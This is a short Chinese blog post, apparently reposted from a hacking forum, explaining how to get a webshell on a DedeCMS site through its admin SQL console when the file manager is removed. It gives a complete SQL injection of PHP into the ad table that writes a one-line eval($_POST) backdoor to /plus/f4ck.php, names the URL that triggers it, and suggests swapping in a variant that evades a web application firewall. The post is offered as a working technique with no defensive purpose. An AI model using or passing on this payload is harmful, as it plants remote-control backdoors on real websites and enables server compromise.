转自:http://sb.f4ck.org/forum.php?mod=viewthread&tid=16548&extra=page%3D1%26filter%3Dauthor%26orderby%3Ddateline%26orderby%3Ddateline
今天搞一个dede遇到站长把文件管理器给删掉了,无法上传php文件,那只能用下其他的办法来解决了。这个方法不记得是在哪个网站看过的思路,自己实践了下。
后台——SQL命令运器——执行命令
INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES (2000, 0, 0, ‘indexTopBanner1’, ‘首页顶部导航大图-960*60’, 0, 1297933028, 1300525028, ‘<?php file_put_contents(”f4ck.php”,”<?php eval($_POST[nimeimei]);?>”); ?>’, ”);
然后访问:http://site/plus/ad_js.php?aid=2000 (id可以自己更换)
文件生成在:/plus/f4ck.php
一句话可以自行替换成过狗的
dedecms最新版本依然可以这样喔!
ps:dedecms后台拿shell的新方法。当然,如果没有把文件编辑器给删掉,可以直接上传拿shell。
转载请注明:jinglingshu的博客 » dede后台没有文件管理器时拿shell方法